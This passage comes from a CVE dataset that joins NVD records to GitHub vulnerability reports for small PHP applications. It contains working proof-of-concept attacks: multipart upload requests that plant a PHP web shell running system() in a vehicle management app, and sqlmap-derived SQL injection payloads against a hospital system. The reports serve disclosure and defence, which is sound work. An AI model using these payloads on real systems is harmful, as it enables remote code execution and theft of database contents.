If (in array ($vote, $allowed_votes)){
//Perform database update operations
}Else{
//Handling invalid inputs
Echo "Invalid vote.";
}
```
### 3 Implement appropriate error handling
+ Avoid displaying SQL error messages in the user interface, which can be achieved through appropriate error handling. Ensure that error messages do not expose sensitive information and instead provide universal user-friendly errors.
#### Example code:
```PHP
Try{
//Perform database operations
}Catch (PDOException $e){
//Record errors to log files
Error log ($e ->getMessage ());
//Display general error messages to users
Echo "An error occurred. Please try again later.";
}
```
### 4 Minimum permission principle
+ Ensure that the database account used by the application only has the minimum permissions to perform necessary operations. For example, if the application does not require permission to delete records, then the account should not have this permission.
| SourceCodester Online Polling System 1.0 save.php SQL injection vulnerability | https://api.github.com/repos/ppp-src/CVE/issues/3/comments | 0 | 2024-05-18T17:22:07Z | 2024-05-18T17:22:07Z | https://github.com/ppp-src/CVE/issues/3 | 2,304,175,120 | 3 | 6,029 |
CVE-2024-5145 | 2024-05-20T23:15:08.533 | A vulnerability was found in SourceCodester Vehicle Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file /newdriver.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-265289 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/38"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.265289"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.265289"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.339721"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/38"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.265289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.265289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.339721"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/CveSecLook/cve/issues/38 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Vehicle Management System in PHP/MySQL 1.0 newdriver.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Vehicle Management System in PHP/MySQL
## Vendor Homepage
+ https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ BI1IHA
## Vulnerable File
+ newdriver.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 25 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ BI1IHA discovered that the file upload operation was triggered on line 25 of the 'newdriver.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
```
POST /newdriver.php HTTP/1.1
Host: 20.20.20.128:8118
Content-Length: 2889
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://20.20.20.128:8118
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycI2toMKBLABUeC5g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://20.20.20.128:8118/newdriver.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drname"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drmobile"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drjoin"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drnid"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drlicense"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="drlicensevalid"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="draddress"
1
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundarycI2toMKBLABUeC5g
Content-Disposition: form-data; name="submit"
æäº¤
------WebKitFormBoundarycI2toMKBLABUeC5g--
```
+ 
## I successfully executed the PHP script on the terminal
+  | SourceCodester Vehicle Management System in PHP/MySQL 1.0 newdriver.php Unrestricted Upload | https://api.github.com/repos/CveSecLook/cve/issues/38/comments | 0 | 2024-05-20T11:32:27Z | 2024-05-20T11:32:28Z | https://github.com/CveSecLook/cve/issues/38 | 2,305,786,142 | 38 | 6,030 |
CVE-2024-5362 | 2024-05-26T12:15:08.023 | A vulnerability classified as critical has been found in SourceCodester Online Hospital Management System 1.0. Affected is an unknown function of the file departmentDoctor.php. The manipulation of the argument deptid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-266274 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/41"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266274"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266274"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.343373"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/41"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266274"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266274"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.343373"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:online_hospital_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D7AE707F-ECBF-4435-B06E-4E87FA07FC29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/CveSecLook/cve/issues/41 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"CveSecLook",
"cve"
] | # SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability
# NAME OF AFFECTED PRODUCT(S)
+ Online Hospital Management System Using PHP/MySQL
## Vendor Homepage
+ https://www.sourcecodester.com/php/14386/online-hospital-management-system-using-phpmysql.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ ZhaoBin Huang
## Vulnerable File
+ departmentDoctor.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/online_hospital_management_system.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ The fourth line of the departmentDoctor.php file uses the PHP method to retrieve user input from the $_GET element. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 5 of the departmentDoctor.php file. This may lead to SQL injection attacks
+ 
## Impact
+ Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
# DESCRIPTION
+ ZhaoBin Huang has discovered that due to insufficient protection of the "deptid" parameter in the "\departmentDoctor.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.database.
## Payload
+ deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
+ 
```
---
Parameter: deptid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: deptid=12' AND 9424=9424 AND 'hYov'='hYov
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: deptid=12' AND (SELECT 2306 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT (ELT(2306=2306,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vptK'='vptK
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: deptid=12' AND (SELECT 3022 FROM (SELECT(SLEEP(5)))IfUz) AND 'rvxr'='rvxr
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: deptid=12' UNION ALL SELECT CONCAT(0x716b707671,0x6b5a4352647756625962434873434d55424c6d437a47745664726d4b736c52667772717653687444,0x71786a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
```
+ This is showing the payload implemented by running sqlmap
+ 
+ The following is the database name displayed as a successful implementation of the attack by running sqlmap
+  | SourceCodester Online Hospital Management System Using PHP/MySQL departmentDoctor.php V1.0 SQL injection vulnerability | https://api.github.com/repos/CveSecLook/cve/issues/41/comments | 0 | 2024-05-23T12:08:12Z | 2024-05-23T12:08:12Z | https://github.com/CveSecLook/cve/issues/41 | 2,312,753,429 | 41 | 6,031 |
CVE-2024-5377 | 2024-05-26T21:15:08.673 | A vulnerability was found in SourceCodester Vehicle Management System 1.0. It has been classified as critical. This affects an unknown part of the file /newvehicle.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266289 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yuyuliq/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266289"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266289"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.343809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/yuyuliq/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266289"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.343809"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/yuyuliq/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"yuyuliq",
"cve"
] | # SourceCodester Vehicle Management System in PHP/MySQL 1.0 newvehicle.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Vehicle Management System in PHP/MySQL
## Vendor Homepage
+ https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Zhou Jiaming
## Vulnerable File
+ newvehicle.php
## VERSION(S)
+ V1.0
## Software Link
+ https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 23 of the newdriver.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ Zhou Jiaming discovered that the file upload operation was triggered on line 23 of the 'newvehicle.php' file and the uploaded file was received using the '$-FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
```
POST /newvehicle.php HTTP/1.1
Host: 20.20.20.128:8118
Content-Length: 990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://20.20.20.128:8118
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBTmrbmZQr7Fj0jSA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://20.20.20.128:8118/newvehicle.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehregno"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="type"
car
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehchesis"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehbrand"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehcolor"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehregdate"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="vehdescription"
1
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: image/jpeg
<?php system("ipconfig"); ?>
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA
Content-Disposition: form-data; name="submit"
鎻愪氦
------WebKitFormBoundaryBTmrbmZQr7Fj0jSA--
```
+ 
## I successfully executed the PHP script on the terminal
+  | SourceCodester Vehicle Management System in PHP/MySQL 1.0 newvehicle.php Unrestricted Upload | https://api.github.com/repos/yuyuliq/cve/issues/1/comments | 0 | 2024-05-24T06:57:55Z | 2024-05-24T06:57:55Z | https://github.com/yuyuliq/cve/issues/1 | 2,314,575,961 | 1 | 6,032 |
CVE-2024-5381 | 2024-05-26T23:15:22.150 | A vulnerability classified as critical was found in itsourcecode Student Information Management System 1.0. Affected by this vulnerability is an unknown functionality of the file view.php. The manipulation of the argument studentId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266293 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
